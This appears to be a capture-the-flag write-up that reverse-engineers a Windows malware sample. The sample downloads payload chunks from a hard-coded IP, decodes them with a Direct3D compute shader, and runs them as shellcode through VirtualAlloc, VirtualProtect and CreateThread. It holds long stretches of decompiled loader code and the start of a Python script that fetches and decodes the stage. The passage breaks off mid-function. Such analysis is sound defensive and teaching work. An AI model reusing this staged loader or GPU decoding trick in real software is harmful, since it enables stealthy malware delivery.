Graphical Malware
Challenge discovery
$ file graphical.exe
graphical.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, 10 sections
The binary is stripped, so it has no symbols (only the binary's own symbols are removed; functions imported from external libraries keep their names, which makes reversing easier).
Some strings in the binary could give us some hints:
D3D11CreateDevice
Microsoft (R) HLSL Shader Compiler 10.1
We will be dealing with some shader in this binary
Reverse the malware
The main function can be found at offset 0x7B4
Child creation
if ( !strcmp(*(const char **)(a2 + 8), "shutlock") )
{
sub_140001E8B();
return 0LL;
}
if ( !strcmp(*(const char **)(a2 + 8), "ctf") )
{
sub_140001F40();
return 0LL;
}
First it checks whether argv[1] is either shutlock or ctf; if so it runs sub_140001E8B or sub_140001F40 respectively and returns. If argv[1] is neither shutlock nor ctf, it continues with the rest of the main function.
It then creates a pipe (on Windows, one of the ways multiple processes can communicate with each other):
PipeAttributes.nLength = 24;
PipeAttributes.lpSecurityDescriptor = 0LL;
PipeAttributes.bInheritHandle = 1;
CreatePipe(&hReadPipe, &hWritePipe, &PipeAttributes, 0)
Then it will create 2 processes:
GetModuleFileNameA(0LL, Filename, 0x104u);
_snprintf_s(Buffer, 0x104uLL, 0x104uLL, "\"%s\" %s", Filename, "shutlock");
_snprintf_s(CommandLine, 0x104uLL, 0x104uLL, "\"%s\" %s", Filename, "ctf");
StartupInfo.hStdOutput = hWritePipe;
dwFlags = StartupInfo.dwFlags;
BYTE1(dwFlags) = BYTE1(StartupInfo.dwFlags) | 1;
StartupInfo.dwFlags = dwFlags;
if ( CreateProcessA(0LL, Buffer, 0LL, 0LL, 1, 0, 0LL, 0LL, &StartupInfo, &ProcessInformation) )
{
CloseHandle(hWritePipe);
WaitForSingleObject(ProcessInformation.hProcess, 0xFFFFFFFF);
lpStartupInfo.hStdInput = hReadPipe;
v6 = lpStartupInfo.dwFlags;
BYTE1(v6) = BYTE1(lpStartupInfo.dwFlags) | 1;
lpStartupInfo.dwFlags = v6;
if ( CreateProcessA(0LL, CommandLine, 0LL, 0LL, 1, 0, 0LL, 0LL, &lpStartupInfo, &hHandle) )
{
CloseHandle(hReadPipe);
WaitForSingleObject(hHandle.hProcess, 0xFFFFFFFF);
CloseHandle(ProcessInformation.hProcess);
CloseHandle(ProcessInformation.hThread);
CloseHandle(hHandle.hProcess);
CloseHandle(hHandle.hThread);
sub_140001360("Finished\n");
return 0LL;
}
First it runs itself with argv[1] = shutlock and redirects this child's stdout to the write end of the previously created pipe (StartupInfo.hStdOutput = hWritePipe;). It waits for that child to exit, then runs itself with argv[1] = ctf, using the read end of the pipe as this child's stdin (lpStartupInfo.hStdInput = hReadPipe;).
For the rest of this writeup we will call child1 the child run with argv[1] = shutlock and child2 the one run with argv[1] = ctf.
Child1
If we look back at the beginning of the main function, we saw that if argv[1] is shutlock it runs sub_140001E8B; we will rename this function child1_main:
/*
 * child1_main (originally sub_140001E8B): entry point of the child started
 * with argv[1] == "shutlock".
 *
 * Obtains the payload buffer from sub_140001CE5() (get_buf), switches the
 * output stream to binary mode and writes the buffer to it, then frees it.
 * Returns 1 when the buffer could not be obtained, 0 otherwise.
 *
 * NOTE(review): off_14000A0D0() takes no visible argument in the decompiler
 * output; it is presumably the CRT stream accessor and the write-up treats
 * it as stdout here -- confirm in the disassembly.
 */
__int64 child1_main()
{
FILE *v1; // rax
int v2; // eax
FILE *v3; // rax
FILE *v4; // rax
size_t ElementCount; // [rsp+20h] [rbp-10h]
void *Buffer; // [rsp+28h] [rbp-8h]
// Download and decode the whole payload (get_buf).
Buffer = (void *)sub_140001CE5();
if ( !Buffer )
return 1LL;
v1 = (FILE *)off_14000A0D0();
v2 = _fileno(v1);
// 0x8000 is _O_BINARY: no newline translation on the raw payload bytes.
_setmode(v2, 0x8000);
// The payload length is requested a second time (get_size) rather than
// being returned by get_buf.
ElementCount = (int)sub_140001ACA();
v3 = (FILE *)off_14000A0D0();
fwrite(Buffer, 1uLL, ElementCount, v3);
v4 = (FILE *)off_14000A0D0();
// Flush so the bytes actually reach the stream before the process exits.
fflush(v4);
free(Buffer);
return 0LL;
}
The child1 main function is very simple: it creates a buffer with sub_140001CE5() and writes it to stdout. Let’s look at sub_140001CE5, which we will rename get_buf:
/*
 * get_buf (originally sub_140001CE5): assembles the decoded payload.
 *
 * Asks sub_140001ACA() (get_size) for the total payload size, allocates that
 * many bytes, then fetches the payload in 16-byte parts through
 * sub_1400018B1() (get_part), copying each part at offset 16 * i.
 *
 * Returns the malloc'ed buffer (the caller frees it), or 0 when the size is
 * not positive, the allocation fails, or any part fails to download/decode.
 */
void *get_buf()
{
int v1; // eax
int v2; // eax
_QWORD Src[3]; // [rsp+20h] [rbp-30h] BYREF
void *Block; // [rsp+38h] [rbp-18h]
int v5; // [rsp+40h] [rbp-10h]
int v6; // [rsp+44h] [rbp-Ch]
int v7; // [rsp+48h] [rbp-8h]
int i; // [rsp+4Ch] [rbp-4h]
// v6 = total payload size in bytes.
v6 = sub_140001ACA();
if ( v6 <= 0 )
return 0LL;
// v5 = (v6 + 15) / 16, i.e. the number of 16-byte parts rounded up.
// The "< 0" adjustment is the compiler's signed-division idiom; it cannot
// trigger here because v6 > 0.
v1 = v6 + 15;
if ( v6 + 15 < 0 )
v1 = v6 + 30;
v5 = v1 >> 4;
Block = malloc(v6);
if ( !Block )
return 0LL;
for ( i = 0; i < v5; ++i )
{
// Only the first 16 bytes of Src are cleared and used as the part buffer.
Src[0] = 0LL;
Src[1] = 0LL;
// 0x927C0 ms = 600000 ms = 10 minutes of delay before every part.
Sleep(0x927C0u);
// Non-zero return means the part could not be fetched or decoded.
if ( (unsigned int)sub_1400018B1((unsigned int)i, Src) )
{
free(Block);
return 0LL;
}
// The last part only contributes the remaining v6 % 16 bytes ...
if ( i == v5 - 1 )
v2 = v6 % 16;
else
v2 = 16;
v7 = v2;
// ... unless the size is an exact multiple of 16, in which case it is full.
if ( !v2 )
v7 = 16;
memcpy((char *)Block + 16 * i, Src, v7);
}
return Block;
}
It gets an int from sub_140001ACA, mallocs a buffer of that size and iterates from 0 to ceil(size / 16) (v1 = v6 + 15; v5 = v1 >> 4;), sleeping for a long time (Sleep(0x927C0), i.e. 10 minutes) before each iteration and then calling sub_1400018B1. Let’s look at those 2 functions, starting with the one that retrieves the size, which we will rename get_size:
/*
 * sub_140001ACA (renamed get_size in the write-up): fetches the payload size.
 *
 * Builds the URL "http://57.128.85.25:50002/size", performs the request with
 * WinINet, reads up to 0x63 (99) bytes of the response, NUL-terminates it and
 * converts it with atoi().
 *
 * Returns the parsed integer, or 0xFFFFFFFF when InternetOpenW,
 * InternetOpenUrlW or InternetReadFile fails. Both handles are closed on
 * every path that opened them.
 */
__int64 sub_140001ACA()
{
WCHAR szUrl[70]; // [rsp+30h] [rbp-50h] BYREF
DWORD dwNumberOfBytesRead; // [rsp+BCh] [rbp+3Ch] BYREF
_QWORD Buffer[12]; // [rsp+C0h] [rbp+40h] BYREF
int v4; // [rsp+120h] [rbp+A0h]
unsigned int v5; // [rsp+12Ch] [rbp+ACh]
HINTERNET hFile; // [rsp+130h] [rbp+B0h]
HINTERNET hInternet; // [rsp+138h] [rbp+B8h]
hFile = 0LL;
// Buffer (96 bytes at rsp+C0h) and v4 (4 bytes at rsp+120h) are adjacent on
// the stack, so they presumably form one zeroed 100-byte response buffer in
// the original source -- which is why a 99-byte read below stays in bounds.
memset(Buffer, 0, sizeof(Buffer));
v4 = 0;
dwNumberOfBytesRead = 0;
v5 = 0;
hInternet = InternetOpenW(L"HTTPGET", 1u, 0LL, 0LL, 0);
if ( !hInternet )
return 0xFFFFFFFFLL;
// sub_140001828 is not shown; from its arguments it looks like a bounded
// wide-character printf (destination, capacity, format, args) -- TODO confirm.
sub_140001828(szUrl, 64LL, L"http://%ls/size", L"57.128.85.25:50002");
hFile = InternetOpenUrlW(hInternet, szUrl, 0LL, 0, 0x2400u, 0LL);
if ( hFile )
{
if ( InternetReadFile(hFile, Buffer, 0x63u, &dwNumberOfBytesRead) )
{
// Terminate the response so atoi() sees a C string.
*((_BYTE *)Buffer + dwNumberOfBytesRead) = 0;
v5 = atoi((const char *)Buffer);
InternetCloseHandle(hFile);
InternetCloseHandle(hInternet);
return v5;
}
else
{
InternetCloseHandle(hFile);
InternetCloseHandle(hInternet);
return 0xFFFFFFFFLL;
}
}
else
{
InternetCloseHandle(hInternet);
return 0xFFFFFFFFLL;
}
}
It does a GET request on http://57.128.85.25:50002/size , parses the response as an int (atoi((const char *)Buffer);) and returns it.
Now what about sub_1400018B1, which we will rename get_part:
/*
 * get_part (originally sub_1400018B1): downloads and decodes one payload part.
 *
 * a1           zero-based part index; the URL uses a1 + 1, so parts are
 *              numbered from 1 on the server.
 * encoded_buff caller buffer; receives up to 16 raw bytes from the server
 *              and is then overwritten in place with the decoded bytes.
 *
 * Returns 0 on success, 1 when a WinINet call fails, and 0xFFFFFFFF when
 * decode() returns NULL.
 */
__int64 __fastcall get_part(int a1, void *encoded_buff)
{
__int64 v3; // [rsp+0h] [rbp-80h] BYREF
__int64 dwFlags; // [rsp+20h] [rbp-60h]
WCHAR szUrl[258]; // [rsp+30h] [rbp-50h] BYREF
DWORD dwNumberOfBytesRead; // [rsp+234h] [rbp+1B4h] BYREF
void *Src; // [rsp+238h] [rbp+1B8h]
HINTERNET hFile; // [rsp+240h] [rbp+1C0h]
HINTERNET hInternet; // [rsp+248h] [rbp+1C8h]
hInternet = 0LL;
hFile = 0LL;
dwNumberOfBytesRead = 0;
// "dwFlags" is a misnamed stack slot: it carries the %d argument (a1 + 1).
LODWORD(dwFlags) = a1 + 1;
// &v3 + 6 is rsp + 0x30, i.e. szUrl: this formats "http://<host>/<a1 + 1>"
// into szUrl.
sub_140001828((__int64)(&v3 + 6), 256LL, (__int64)L"http://%ls/%d", L"57.128.85.25:50002", dwFlags);
hInternet = InternetOpenW(L"HTTPGET", 1u, 0LL, 0LL, 0);
if ( !hInternet )
return 1LL;
// Another 600000 ms (10 minute) delay, on top of the one in get_buf.
Sleep(0x927C0u);
hFile = InternetOpenUrlW(hInternet, szUrl, 0LL, 0, 0x2400u, 0LL);
if ( hFile )
{
// At most 0x10 (16) bytes are read per part.
if ( InternetReadFile(hFile, encoded_buff, 0x10u, &dwNumberOfBytesRead) )
{
InternetCloseHandle(hFile);
InternetCloseHandle(hInternet);
// decode() returns a separately allocated buffer holding the decoded
// bytes (it is freed below), or NULL on failure.
Src = (void *)decode(a1, (__int64)encoded_buff, dwNumberOfBytesRead);
if ( Src )
{
memcpy(encoded_buff, Src, dwNumberOfBytesRead);
free(Src);
return 0LL;
}
else
{
return 0xFFFFFFFFLL;
}
}
else
{
InternetCloseHandle(hFile);
InternetCloseHandle(hInternet);
return 1LL;
}
}
else
{
InternetCloseHandle(hInternet);
return 1LL;
}
}
It also does a GET request on the same IP to retrieve the n-th part, and then calls decode(a1, (__int64)encoded_buff, dwNumberOfBytesRead), which in turn calls (__int64)sub_140002353(encoded_buff, size, 0xDEADBEEF - 0x42 * a1); we will rename that function gpu_decode:
/*
 * gpu_decode (originally sub_140002353): decodes a buffer with a Direct3D 11
 * compute shader.
 *
 * encoded_buff  address of the encoded bytes (uploaded with UpdateSubresource)
 * size          number of bytes to decode
 * key           32-bit key written into the shader's constant buffer
 *
 * Sequence: create a D3D11 device, create a 16-byte constant buffer plus two
 * buffers of size rounded up to a multiple of 4, upload the data and the key,
 * create an unordered access view on the data buffer, load resource 0x65 as
 * a compute shader, dispatch it, then hand the buffers to sub_140002182()
 * together with a freshly malloc'ed output buffer.
 *
 * Returns the malloc'ed output buffer when sub_140002182() returns non-zero;
 * otherwise releases the COM objects and returns 0.
 *
 * NOTE(review): in this decompiler output the success path returns without
 * releasing any COM object, and v23 is neither NULL-checked nor freed when
 * sub_140002182() returns 0.
 */
void *__fastcall gpu_decode(__int64 encoded_buff, size_t size, unsigned int key)
{
_QWORD *v4; // rcx
__int64 v5; // rdx
__int64 v6; // [rsp+58h] [rbp-28h] BYREF
_QWORD *v7; // [rsp+60h] [rbp-20h] BYREF
__int64 v8; // [rsp+70h] [rbp-10h]
__int64 v9; // [rsp+78h] [rbp-8h]
__int64 v10; // [rsp+80h] [rbp+0h] BYREF
int v11; // [rsp+88h] [rbp+8h]
unsigned int v12; // [rsp+8Ch] [rbp+Ch]
int v13; // [rsp+90h] [rbp+10h]
__int64 v14; // [rsp+A0h] [rbp+20h]
__int64 v15; // [rsp+A8h] [rbp+28h]
__int64 v16; // [rsp+B0h] [rbp+30h]
__int128 v17; // [rsp+C0h] [rbp+40h]
__int64 v18; // [rsp+D8h] [rbp+58h] BYREF
__int64 v19; // [rsp+E0h] [rbp+60h] BYREF
__int64 v20; // [rsp+E8h] [rbp+68h] BYREF
ID3D11DeviceContext *ppImmediateContext; // [rsp+F0h] [rbp+70h] BYREF
ID3D11Device *ppDevice; // [rsp+F8h] [rbp+78h] BYREF
void *v23; // [rsp+100h] [rbp+80h]
unsigned int v24; // [rsp+108h] [rbp+88h]
unsigned int v25; // [rsp+10Ch] [rbp+8Ch]
LPVOID v26; // [rsp+110h] [rbp+90h]
HGLOBAL hResData; // [rsp+118h] [rbp+98h]
DWORD v28; // [rsp+124h] [rbp+A4h]
HRSRC hResInfo; // [rsp+128h] [rbp+A8h]
unsigned int v30; // [rsp+130h] [rbp+B0h]
unsigned int v31; // [rsp+134h] [rbp+B4h]
HRESULT v32; // [rsp+138h] [rbp+B8h]
int v33; // [rsp+13Ch] [rbp+BCh]
__int64 v34; // [rsp+140h] [rbp+C0h]
__int64 v35; // [rsp+148h] [rbp+C8h]
// Every COM pointer starts at 0 so the cleanup code at the end can tell
// which objects were actually created.
ppDevice = 0LL;
ppImmediateContext = 0LL;
v35 = 0LL;
v34 = 0LL;
v20 = 0LL;
v19 = 0LL;
v18 = 0LL;
v33 = size;
// Hardware device on the default adapter; 7 is the SDK version argument.
v32 = D3D11CreateDevice(0LL, D3D_DRIVER_TYPE_HARDWARE, 0LL, 0, 0LL, 0, 7u, &ppDevice, 0LL, &ppImmediateContext);
if ( v32 < 0 )
{
sub_1400020D0("D3D11CreateDevice failed\n");
return 0LL;
}
// v14..v17 are written but never read in this listing; presumably a leftover
// buffer descriptor (0x10 bytes, usage 2, bind 4) -- TODO confirm.
v17 = 0LL;
v16 = 0LL;
v14 = 0x200000010LL;
v15 = 0x1000000000004LL;
// sub_140002263 is not shown; it appears to create a buffer from
// (device, byte size, bind flags, usage, <flag>). v19 is the 16-byte
// constant buffer that will hold the key (bind 4 / usage 2 match
// D3D11_BIND_CONSTANT_BUFFER / D3D11_USAGE_DYNAMIC -- TODO confirm).
v19 = sub_140002263((__int64)ppDevice, 16, 4u, 2, 0);
if ( v19 )
{
v31 = size;
// Round the byte count up to a multiple of 4: the shader works on 32-bit
// elements.
v30 = (size + 3) & 0xFFFFFFFC;
// v35: data buffer the shader reads and writes (bind flags 0x88).
// v34: second buffer with no bind flags and usage 3, presumably a staging
// buffer for reading the result back -- TODO confirm.
v35 = sub_140002263((__int64)ppDevice, v30, 0x88u, 0, 0);
v34 = sub_140002263((__int64)ppDevice, v30, 0, 3, 1);
if ( v35 && v34 )
{
// Upload the encoded bytes into the data buffer.
((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD, __int64, _DWORD, _DWORD))ppImmediateContext->lpVtbl->UpdateSubresource)(
ppImmediateContext,
v35,
0LL,
0LL,
encoded_buff,
0,
0);
// v10..v13 form the descriptor passed to CreateUnorderedAccessView below:
// first dword 0, second dword 1, then 0, then the element count
// (v30 >> 2 32-bit elements), then 0.
v13 = _mm_cvtsi128_si32((__m128i)0LL);
v10 = 0x100000000LL;
v11 = 0;
v12 = v30 >> 2;
// 16 bytes of constant-buffer content: the key in the low dword, the rest 0.
v8 = key;
v9 = 0LL;
// Map the constant buffer (map type 4), copy the 16 bytes, unmap.
((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, __int64, _DWORD, _QWORD **))ppImmediateContext->lpVtbl->Map)(
ppImmediateContext,
v19,
0LL,
4LL,
0,
&v7);
v4 = v7;
v5 = v9;
*v7 = v8;
v4[1] = v5;
((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD))ppImmediateContext->lpVtbl->Unmap)(
ppImmediateContext,
v19,
0LL);
// Bind the key buffer to compute-shader constant buffer slot 0.
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *))ppImmediateContext->lpVtbl->CSSetConstantBuffers)(
ppImmediateContext,
0LL,
1LL,
&v19);
// v20 receives the unordered access view over the data buffer.
v32 = ((__int64 (__fastcall *)(ID3D11Device *, __int64, __int64 *, __int64 *))ppDevice->lpVtbl->CreateUnorderedAccessView)(
ppDevice,
v35,
&v10,
&v20);
if ( v32 >= 0 )
{
// The shader bytecode is embedded in this executable as resource
// ID 0x65 (101), resource type 0xA.
hResInfo = FindResourceA(0LL, (LPCSTR)0x65, (LPCSTR)0xA);
if ( hResInfo )
{
v28 = SizeofResource(0LL, hResInfo);
hResData = LoadResource(0LL, hResInfo);
if ( hResData )
{
v26 = LockResource(hResData);
// v18 receives the compute shader object.
v32 = ((__int64 (__fastcall *)(ID3D11Device *, LPVOID, _QWORD, _QWORD, __int64 *))ppDevice->lpVtbl->CreateComputeShader)(
ppDevice,
v26,
v28,
0LL,
&v18);
if ( v32 >= 0 )
{
// Bind the UAV to slot 0 and select the shader.
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
ppImmediateContext,
0LL,
1LL,
&v20,
0LL);
((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
ppImmediateContext,
v18,
0LL,
0LL);
// v25 = number of 32-bit elements, v24 = that count divided by 256 and
// rounded up = number of thread groups dispatched along X.
v25 = (unsigned int)(v33 + 3) >> 2;
v24 = (v25 + 255) >> 8;
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64))ppImmediateContext->lpVtbl->Dispatch)(
ppImmediateContext,
v24,
1LL,
1LL);
// Unbind the UAV (slot 0 <- null) and the shader once the work is queued.
v6 = 0LL;
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
ppImmediateContext,
0LL,
1LL,
&v6,
0LL);
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
ppImmediateContext,
0LL,
0LL,
0LL);
// sub_140002182 is not shown; from its arguments (context, data buffer,
// second buffer, destination, byte count) it presumably copies the shader
// output back into v23 -- TODO confirm.
v23 = malloc(size);
if ( (unsigned int)sub_140002182((__int64)ppImmediateContext, v35, v34, (__int64)v23, v31) )
return v23;
}
else
{
puts("CreateComputeShader failed");
}
}
else
{
puts("LoadResource failed");
}
}
else
{
puts("FindResource failed");
}
}
else
{
sub_1400020D0("CreateUAV failed\n");
}
}
else
{
sub_1400020D0("buffer creation failed\n");
}
}
else
{
puts("Create constant buffer failed");
}
// Failure cleanup. Vtable offset 16 is the third slot, i.e. Release -- the
// same call made by name on ppImmediateContext and ppDevice below.
if ( v20 )
(*(void (__fastcall **)(__int64))(*(_QWORD *)v20 + 16LL))(v20);
if ( v18 )
(*(void (__fastcall **)(__int64))(*(_QWORD *)v18 + 16LL))(v18);
if ( v35 )
(*(void (__fastcall **)(__int64))(*(_QWORD *)v35 + 16LL))(v35);
if ( v34 )
(*(void (__fastcall **)(__int64))(*(_QWORD *)v34 + 16LL))(v34);
if ( ppImmediateContext )
((void (__fastcall *)(ID3D11DeviceContext *))ppImmediateContext->lpVtbl->Release)(ppImmediateContext);
if ( ppDevice )
((void (__fastcall *)(ID3D11Device *))ppDevice->lpVtbl->Release)(ppDevice);
if ( v19 )
(*(void (__fastcall **)(__int64))(*(_QWORD *)v19 + 16LL))(v19);
return 0LL;
}
This function uses Direct3D 11 (https://fr.wikipedia.org/wiki/Direct3D ), which according to Wikipedia: “Direct3D is a graphics application programming interface (API) for Microsoft Windows. Part of DirectX, Direct3D is used to render three-dimensional graphics in applications where performance is important, such as games.”
So why are there 3D libraries in a binary that looks like malware?
Let’s get a better understanding of the function. It does the following:
First it creates a Direct3D device, initialises it and loads the encoded buffer and the key into it
D3D11CreateDevice(0LL, D3D_DRIVER_TYPE_HARDWARE, 0LL, 0, 0LL, 0, 7u, &ppDevice, 0LL, &ppImmediateContext);
(void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD, __int64, _DWORD, _DWORD))ppImmediateContext->lpVtbl->UpdateSubresource)(
ppImmediateContext,
v35,
0LL,
0LL,
encoded_buff,
0,
0);
(void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, __int64, _DWORD, _QWORD **))ppImmediateContext->lpVtbl->Map)(
ppImmediateContext,
v19,
0LL,
4LL,
0,
&v7);
(void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD))ppImmediateContext->lpVtbl->Unmap)(
ppImmediateContext,
v19,
0LL);
(void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *))ppImmediateContext->lpVtbl->CSSetConstantBuffers)(
ppImmediateContext,
0LL,
1LL,
&v19);
(__int64 (__fastcall *)(ID3D11Device *, __int64, __int64 *, __int64 *))ppDevice->lpVtbl->CreateUnorderedAccessView)(
ppDevice,
v35,
&v10,
&v20);
Then it loads the resource with the ID 0x65 (101)
hResInfo = FindResourceA(0LL, (LPCSTR)0x65, (LPCSTR)0xA);
v28 = SizeofResource(0LL, hResInfo);
hResData = LoadResource(0LL, hResInfo);
v26 = LockResource(hResData);
Then it uses the resource to create a compute shader and runs it
v32 = ((__int64 (__fastcall *)(ID3D11Device *, LPVOID, _QWORD, _QWORD, __int64 *))ppDevice->lpVtbl->CreateComputeShader)(
ppDevice,
v26,
v28,
0LL,
&v18);
if ( v32 >= 0 )
{
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
ppImmediateContext,
0LL,
1LL,
&v20,
0LL);
((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
ppImmediateContext,
v18,
0LL,
0LL);
v25 = (unsigned int)(v33 + 3) >> 2;
v24 = (v25 + 255) >> 8;
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64))ppImmediateContext->lpVtbl->Dispatch)(
ppImmediateContext,
v24,
1LL,
1LL);
v6 = 0LL;
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
ppImmediateContext,
0LL,
1LL,
&v6,
0LL);
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
ppImmediateContext,
0LL,
0LL,
0LL);
And finally it creates a buffer and calls sub_140002182
v23 = malloc(a2);
if ( (unsigned int)sub_140002182((_DWORD)ppImmediateContext, v35, v34, (_DWORD)v23, v31) )
return v23;
Retrieve the shader
We know that the shader is loaded from a resource with ID 101 (which is located in the .rsrc section). We can use many techniques to retrieve it, but I usually do it using PEstudio (https://www.winitor.com/download , the free version is enough): we load graphical.exe in it and then look at the resources panel.

We can see the resource we are looking for, with ID 101. We can dump it using Right Click -> instance -> save to file. We also see that the first bytes of the resource are DXBC, which, with a bit of Googling, indicates that it is shader bytecode for Direct3D.
We can disassemble it using fxc:
C:/Program\ Files\ \(x86\)/Windows\ Kits/10/bin/10.0.22621.0/x64/fxc.exe /dumpbin /nologo ressource.dump
//
// Generated by Microsoft (R) HLSL Shader Compiler 10.1
//
//
// Buffer Definitions:
//
// cbuffer KeyCB
// {
//
// uint xorKey; // Offset: 0 Size: 4
//
// }
//
// Resource bind info for gData
// {
//
// uint $Element; // Offset: 0 Size: 4
//
// }
//
//
// Resource Bindings:
//
// Name Type Format Dim HLSL Bind Count
// ------------------------------ ---------- ------- ----------- -------------- ------
// gData UAV struct r/w u0 1
// KeyCB cbuffer NA NA cb0 1
//
//
//
// Input signature:
//
// Name Index Mask Register SysValue Format Used
// -------------------- ----- ------ -------- -------- ------- ------
// no Input
//
// Output signature:
//
// Name Index Mask Register SysValue Format Used
// -------------------- ----- ------ -------- -------- ------- ------
// no Output
cs_5_0
dcl_globalFlags refactoringAllowed
dcl_constantbuffer CB0[1], immediateIndexed
dcl_uav_structured u0, 4
dcl_input vThreadID.x
dcl_temps 1
dcl_thread_group 256, 1, 1
bufinfo_indexable(structured_buffer, stride=4)(mixed,mixed,mixed,mixed) r0.x, u0.xyzw
ult r0.x, vThreadID.x, r0.x
if_nz r0.x
ld_structured_indexable(structured_buffer, stride=4)(mixed,mixed,mixed,mixed) r0.x, vThreadID.x, l(0), u0.xxxx
xor r0.x, r0.x, cb0[0].x
iadd r0.x, r0.x, l(0x11001122)
store_structured u0.x, vThreadID.x, l(0), r0.x
endif
ret
// Approximately 9 instruction slots used
The shader is simple: it takes the buffer (gData) bound to u0 and the key (KeyCB) bound to cb0, XORs each 32-bit element of the buffer with the key and then adds 0x11001122 to the result.
OK, now we understand how each part is decoded: it derives the key for each part as 0xDEADBEEF - 0x42 * i (i being the zero-based index of the part of the encoded data), XORs each 32-bit word of the encoded data with the derived key and then adds 0x11001122.
If we go back to get_buf, each decoded block is appended to the previous one (memcpy((char *)Block + 16 * i, Src, v7);), the result is returned to child1_main, and then it is simply written to stdout. Surely that cannot do any damage?
Child2
If we remember what we saw in the main function, everything written to the stdout of the 1st child is redirected into the pipe and then to Child2 (because the stdin of the 2nd child is the pipe), so let’s take a look at the main function of the 2nd child:
/*
 * child2_main (originally sub_140001F40): entry point of the child started
 * with argv[1] == "ctf".
 *
 * Fetches the payload size with get_size(), reads exactly that many bytes
 * from the input stream, copies them into freshly allocated memory, changes
 * that memory's protection and starts a thread at its first byte.
 *
 * Returns 1 when the size is 0 or above 0x1000, when malloc fails, or when
 * fewer bytes than expected are read; returns 0 after the thread finishes.
 *
 * NOTE(review): off_14000A0D0() is the same accessor child1_main uses for
 * its output stream; the write-up treats it as stdin here -- the decompiler
 * presumably dropped the stream index argument.
 */
__int64 child2_main()
{
FILE *v0; // rax
int v1; // eax
FILE *v3; // rax
DWORD flOldProtect; // [rsp+34h] [rbp-2Ch] BYREF
HANDLE hHandle; // [rsp+38h] [rbp-28h]
BOOL v6; // [rsp+44h] [rbp-1Ch]
void *lpAddress; // [rsp+48h] [rbp-18h]
void *Buffer; // [rsp+50h] [rbp-10h]
size_t Size; // [rsp+5Ch] [rbp-4h]
flOldProtect = 0;
v0 = (FILE *)off_14000A0D0();
v1 = _fileno(v0);
// 0x8000 is _O_BINARY: the payload must be read without newline translation.
_setmode(v1, 0x8000);
// Only the low 32 bits of Size are ever written or read.
LODWORD(Size) = get_size();
// Reject an empty payload and anything larger than 0x1000 (4096) bytes; a
// failed get_size() (0xFFFFFFFF) is rejected by the same test.
if ( !(_DWORD)Size || (unsigned int)Size > 0x1000 )
return 1LL;
Buffer = malloc((unsigned int)Size);
if ( !Buffer )
return 1LL;
v3 = (FILE *)off_14000A0D0();
if ( fread(Buffer, 1uLL, (unsigned int)Size, v3) == (unsigned int)Size )
{
// 0x3000 = MEM_COMMIT | MEM_RESERVE, protection 4 = PAGE_READWRITE.
// The result is not checked before use.
lpAddress = VirtualAlloc(0LL, (unsigned int)Size, 0x3000u, 4u);
memmove(lpAddress, Buffer, (unsigned int)Size);
// 0x20 = PAGE_EXECUTE_READ: make the copied payload executable.
v6 = VirtualProtect(lpAddress, (unsigned int)Size, 0x20u, &flOldProtect);
// Run the payload as a thread and wait indefinitely for it to finish.
hHandle = CreateThread(0LL, 0LL, (LPTHREAD_START_ROUTINE)lpAddress, 0LL, 0, 0LL);
WaitForSingleObject(hHandle, 0xFFFFFFFF);
return 0LL;
}
else
{
puts("stdin read error");
free(Buffer);
return 1LL;
}
}
The child2’s main function is really straightforward: it retrieves the payload size (using the same HTTP request as the 1st child), reads that many bytes from stdin and then does a classic VirtualAlloc -> VirtualProtect -> CreateThread sequence to execute what has been read.
Get the final stage payload
So in summary the binary works like this:
- It creates 2 child processes
- Child1 -> gets N parts of 16 bytes each from a remote server -> decodes them on the GPU -> writes the decoded payload to its stdout, which the pipe feeds to the stdin of the 2nd child
- Child2 -> reads the decoded payload -> executes it
We just need to retrieve each payload part and decode it, and we should get some valid executable code. Here is a python3 script that does those steps:
import requests
from pathlib import Path
from struct import unpack_from, pack_into
URL = "http://57.128.85.25:50002"
BASE_KEY = 0xDEADBEEF
session = requests.Session()
def fetch(path: str) -> bytes:
    """Download ``URL/<path>`` and return the raw response body.

    Leading slashes in ``path`` are dropped so the joined URL never contains
    a double slash. Any HTTP error status raises via ``raise_for_status()``.
    """
    endpoint = path.lstrip('/')
    response = session.get(f"{URL}/{endpoint}", timeout=10)
    response.raise_for_status()
    return response.content
def decode_chunk(chunk, part, base_key=None) -> bytes:
    """Decode one payload part the way the malware's compute shader does.

    Each little-endian 32-bit word is XORed with the per-part key and then
    0x11001122 is added (mod 2**32).

    chunk:    raw bytes as served by ``/<part>``.
    part:     1-based part number, as used in the URL. The binary derives the
              key from the 0-based index, hence ``part - 1``.
    base_key: key of the first part; defaults to the module-level BASE_KEY.

    Returns exactly ``len(chunk)`` decoded bytes.
    """
    if base_key is None:
        base_key = BASE_KEY
    key = (base_key - (part - 1) * 0x42) & 0xFFFFFFFF

    # The binary rounds the buffer up to a multiple of 4 before handing it to
